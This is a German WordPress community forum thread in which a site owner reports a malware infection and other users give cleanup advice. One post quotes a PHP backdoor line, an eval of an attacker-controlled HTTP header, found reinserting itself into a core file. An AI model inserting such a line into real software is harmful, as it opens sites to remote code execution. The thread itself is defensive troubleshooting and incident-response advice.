1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

WP 6.x Virenbefall

Dieses Thema im Forum "Allgemeines" wurde erstellt von mteepee, 12. August 2024.

  1. mteepee

    mteepee Well-Known Member

    Registriert seit:
    23. Januar 2012
    Beiträge:
    498
    Zustimmungen:
    10
    Hi,
    hab auf einer meiner Seite einen Virenbefall. Das schaut so aus wenn ich auf Customizer gehe.
    Was kann ich tun?
    Wo könnte ich forschen?
    Grüße
    marco
     

    Anhänge:

  2. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    12.168
    Zustimmungen:
    1.885
    Das allgemeine Vorgehen bei einem Hack ist z.B. hier beschrieben, das könntest Du mit jemandem mit WordPress Erfahrung bei Dir im näheren Umfeld zusammen durchgehen. Jeden einzelnen Punkt.

    Und wo die Inhalte im Customizers herkommen, kann man in der Browser Konsole im Netzwerk Tab sehen, das erleichert dann das weitere Nachvollziehen zumindest des sichtbaren Befalls.

    Nach einem Hack ist jedoch alles auf dem Server inkl. Datenbank als kompromitiert zu betrachten. Das nachträgliche Entfernen einzelner Schadcodes oder Auswirkungen ist nicht ausreichend. Es können auch mehrere Hacks erfolgt sein, ggf. auch zu anderen Zeitpunkten.
     
    #2 b3317133, 12. August 2024
    Zuletzt bearbeitet: 12. August 2024
    arnego2 gefällt das.
  3. uha

    uha Well-Known Member

    Registriert seit:
    14. Juli 2017
    Beiträge:
    176
    Zustimmungen:
    30
  4. mteepee

    mteepee Well-Known Member

    Registriert seit:
    23. Januar 2012
    Beiträge:
    498
    Zustimmungen:
    10
    Ich habe nun alle schadhaften Dateien entweder gelöscht oder mit Original-Dateien (Wordpress Core) ersetzt. Ich habe nur noch ein Problem, was mir Wordfence anzeigt. Und das ist folgendes:

    Und zwar unter /web/wp-includes gibt es die Datei templates.php.
    Hier schreibt sich immer ein Code rein, der auf einen externen Server zeigt. Die Code-Zeile lautet:

    @eval($_SERVER['HTTP_86700EA']);
    Hab danach gegooglet: Klarer Fall von Malware. Problem ist: Lösche ich diese Zeile, schreibt sich diese in 10 Sek wieder in das File. Wenn ich die Datei mit einer neuen, also Originaldatei ersetze das gleiche: Es schreibt sich wieder der Code in diese Datei. So wird es auch im Internet beschrieben. Heisst: Es gibt noch irgendeine Backdoor, die das zulässt bzw. veranlasst.
    Und ich komme einfach nicht weiter, diese Backdoor zu finden.
    Ich bin kurz vor dem Ziel, den Server komplett sauber zu haben, bzw. die Installation - nur noch das eine Ding.

    Hat von euch einer eine Idee, wie ich hier weiterkomme und dem Ganzen ein Ende bereite?
    Danke und Gruß
    Marco
     
  5. uha

    uha Well-Known Member

    Registriert seit:
    14. Juli 2017
    Beiträge:
    176
    Zustimmungen:
    30
    Eine manuelle Bereinigung der Website sieht vor, dass du
    • das Verzeichnis wp-content/uploads auf deinem Computer sicherst und sehr sorgfältig auf Malware untersuchst. Auch harmlos aussehende Dateien mit Endungen wie .jpg oder .png können (statt Bildern) Skripte enthalten. Angreifer verstecken da gerne eine Backdoor, um sich nach einer Entfernung von Malware wieder einloggen und ihre Schadsoftware neu einstallieren zu können. Wenn du hier nicht sorgfältig arbeitest, fängst du nach ein paar Tagen von vorne an.
    • eine Liste der verwendeten Themes und Plugins muss erstellt werden, um diese später wieder zu installieren. Die wp-config.php sollte auf fremde Skript (meistens mit base64_encode() verschlüsselt) geprüft und ebenfalls gesichert werden.
    • du löschst ausnahmslos alles auf deinem Webserver, lädst WordPress, vorher notierte Theme(s) und Plugins aus dem WordPress-Verzeichnis herunter, entpackst sie und lädst alles auf deinen Server hoch. Die Datei https://downloads.wordpress.org/release/wordpress-6.5.5-no-content.zip enthält die aktuelle WordPress-Version ohne das Verzeichnis wp-content.
    • danach lädst du die vorher gesicherte wp-config.php und das geprüfte(!) Verzeichnis wp-content wieder hoch.
    • Über die Datenbankverwaltung deines Webhosters solltest du in der Datenbank-Tabelle wp_users prüfen, ob der Angreifer ein eigenes Administratoren-Account angelegt hat, das du natürlich löschen musst.
    Der Vorgang kann mit dem kostenpflichtigen Skript WP Sweeper automatisiert werden.

    Es ist eine gute Idee, auch von der manipulierten Website ein Backup zu machen, bevor du die oben genannten Schritte durchführst. Wie man im Rheinland sagt: Wat fott is, is fott (weg ist weg) – versehentlich zu viel gelöschte Daten lassen sich nicht wiederherstellen, wenn es kein Backup gibt.

    Der komplette Vorgang ist recht aufwändig und damit kostenintensiv. Wenn du dich selbst eher als Einsteiger einstufst, wäre es eine gute Idee, das einem Fachmann (oder einer Fachfrau – es gibt ausgezeichnete WordPress-Spezialistinnen) zu überlassen.
     
  6. arnego2

    arnego2 Well-Known Member

    Registriert seit:
    10. Januar 2021
    Beiträge:
    664
    Zustimmungen:
    69
    Die Seite komplett neu aufbauen ist das sicherste.
    Die Seite in html5 und die Gefahr einen Infiltrierung über Plugins wird unmöglich.
     
  7. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    12.168
    Zustimmungen:
    1.885
    Es fehlt zudem mindestens noch die Prüfung und Bereinigung aller Inhalte in der kompletten Datenbank.

    Und die als erster Schritt nötige vorherige Analyse der Log-Dateien zum Auffinden und Schliessen der Lücke, siehe auch Link in Antwort #2 oben.
     
  8. JABA-Hosting

    JABA-Hosting Well-Known Member

    Registriert seit:
    29. März 2016
    Beiträge:
    3.014
    Zustimmungen:
    205
    Eine Bereinigung ist möglich nur mit Aufwand verbunden. Kundenseiten bereinigen wir deutlich schneller und kostengünstiger, da nicht alles mühselig über FTP läuft.
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden